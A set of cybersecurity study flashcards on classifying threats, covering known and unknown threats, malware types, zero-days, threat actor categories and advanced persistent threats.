Section 4: Classifying Threats Flashcards

1
Q

What are the two highest levels of threat classification categories?

A

Known threats and unknown threats

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
2
Q

Define known threats.

A

Any threat that can be identified using basic signature or pattern matching

Examples include malware and documented exploits.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
3
Q

What is malware?

A

Any software intentionally designed to cause damage to a computer, server, client, or computer network

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
4
Q

List examples of malware.

A
  • Viruses
  • Rootkits
  • Trojans
  • Botnets
How well did you know this?
1
Not at all
2
3
4
5
Perfectly
5
Q

What is a documented exploit?

A

A piece of software, data, or a sequence of commands that takes advantage of a vulnerability to cause unintended behavior or gain unauthorized access

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
6
Q

How can known threats be detected?

A

Using signatures, hash values, or other detection methods

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
7
Q

What is an unknown threat?

A

Any threat that cannot be identified using basic signature or pattern matching

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
8
Q

What is a zero-day exploit?

A

An unknown exploit in the wild that exposes a vulnerability in software or hardware

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
9
Q

What issues can arise from a zero-day vulnerability?

A

It can create complicated problems before anyone realizes something is wrong

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
10
Q

Define obfuscated malware code.

A

Malicious code whose execution has been hidden through techniques like compression, encryption, or encoding

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
11
Q

What is behavior-based detection?

A

A malware detection method that evaluates an object based on its intended actions before it executes

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
12
Q

Explain the concept of recycled threats.

A

Combining and modifying parts of existing exploit code to create new threats that are not easily identified

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
13
Q

What are known unknowns?

A

A classification of malware that contains obfuscated techniques to circumvent signature matching and detection

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
14
Q

What are unknown unknowns?

A

A classification of malware that contains completely new attack vectors and exploits

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
15
Q

What are the four quadrants in the threat classification chart?

A
  • Known knowns
  • Unknown knowns
  • Known unknowns
  • Unknown unknowns
How well did you know this?
1
Not at all
2
3
4
5
Perfectly
16
Q

What are known knowns?

A

Things that we are certain of with established signatures

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
17
Q

What are unknown knowns?

A

Something known to others but not known to you

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
18
Q

What is a known unknown?

A

An unknown thing that lacks a signature but is recognized as potentially harmful

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
19
Q

What are unknown unknowns?

A

Things that are not known to either party, requiring research to discover

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
20
Q

What is the Johari Window?

A

A concept with four quadrants: open, blind, hidden, and unknown, aimed at increasing known information

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
21
Q

What does the ‘open’ quadrant in the Johari Window represent?

A

Knowledge that is known to both the individual and others

22
Q

What does the ‘hidden’ quadrant in the Johari Window represent?

A

Knowledge that is known to the individual but not known to others

23
Q

What does the ‘blind’ quadrant in the Johari Window represent?

A

Knowledge that is known to others but not known to the individual

24
Q

What does the ‘unknown’ quadrant in the Johari Window represent?

A

Knowledge that is not known to either the individual or others

25
Q

What is the term used to describe individuals who want to harm networks or steal secure data?

A

Threat actor

Threat actors can include various categories of adversaries.

26
Q

What are the two main categories of threat actors based on their structure?

A

Structured and unstructured

These categories reflect the organization and skill level of the threat actors.

27
Q

What is the difference between a hacker and a cracker?

A

A hacker is a computer enthusiast, while a cracker is a hacker with malicious intent.

The terms have been blended in media, but the distinction is important in cybersecurity.

28
Q

What are the three types of hackers based on the ‘hats’ they wear?

A
  • Black hat hackers
  • White hat hackers
  • Gray hat hackers

Each type represents a different ethical stance on hacking.

29
Q

What is a script kiddie?

A

An attacker with the least amount of skill who uses others’ tools for attacks.

Script kiddies typically do not develop their own hacking tools.

30
Q

What is an insider threat?

A

An employee or former employee with knowledge of the organization’s network who may cause harm.

Insider threats can be intentional or unintentional.

31
Q

What are the two types of insider threats?

A
  • Intentional insider threats
  • Unintentional insider threats

Intentional threats involve deliberate harm, while unintentional threats arise from carelessness or errors.

32
Q

What motivates competitors as threat actors?

A

Stealing proprietary data, disrupting business, or damaging reputation.

Competitors may use insider threats to achieve their goals.

33
Q

What characterizes organized crime as a threat actor?

A

Focus on hacking and computer fraud for financial gain.

Organized crime groups often use sophisticated attacks and tools.

34
Q

What defines a hacktivist?

A

Politically motivated hackers targeting governments and corporations to advance their agendas.

Hacktivists can act individually or as part of larger groups.

35
Q

What is a nation-state in the context of cybersecurity?

A

A highly skilled threat actor with exceptional capability and intent to achieve political motives through cyber attacks.

Nation-states often conduct advanced persistent threats (APTs).

36
Q

What is an APT?

A

Advanced Persistent Threat, a long-term presence on a network to gather sensitive information.

APTs can be carried out by various actors, including nation-states and criminal organizations.

37
Q

What is a false flag attack?

A

An attack designed to appear as if it was conducted by a different group.

This tactic is used for plausible deniability by the actual perpetrators.

38
Q

Fill in the blank: A _______ is a simple program often used by script kiddies to conduct denial of service attacks.

A

Low Orbit Ion Cannon

This tool allows users to easily execute attacks without in-depth knowledge.

39
Q

What are key defensive measures against insider threats?

A
  • Employee education and training
  • Access controls
  • Incident response plans
  • Regular monitoring of user activity

These measures help mitigate risks associated with insider threats.

40
Q

What was the 2020 SolarWinds attack an example of?

A

A supply chain attack conducted by nation-state actors.

It involved compromising a software update to access numerous networks.

41
Q

What is the impact of unintentional insider threats?

A

Causes harm unintentionally due to carelessness or lack of knowledge.

Examples include falling for phishing emails or using weak passwords.

42
Q

True or False: All APTs are nation-state actors.

A

False

While most nation-state actors are APTs, not all APTs are affiliated with nation-states.

43
Q

What does APT stand for?

A

Advanced Persistent Threat

44
Q

What is the primary characteristic of an APT?

A

Establishes a long-term presence on a network

45
Q

What is the main goal of an advanced persistent threat?

A

Harvest sensitive data, intellectual property, and other sensitive information

46
Q

Who can carry out APTs?

A

Nation-states, criminal organizations, and individual hackers

47
Q

How long can APTs infiltrate a network?

A

From weeks to months or even years

48
Q

What does the term ‘living off the land’ refer to in the context of APTs?

A

Using tools that already exist on the computer

49
Q

True or False: APTs are typically poorly funded and disorganized.

50
Q

What differentiates a nation-state actor from an APT?

A

A nation-state actor is affiliated with a government, while an APT is a type of cyber attack

51
Q

What level of persistence is associated with APTs?

A

High level of persistence and determination

52
Q

Fill in the blank: APTs carefully hide their activity and blend in with _______.

A

normal network traffic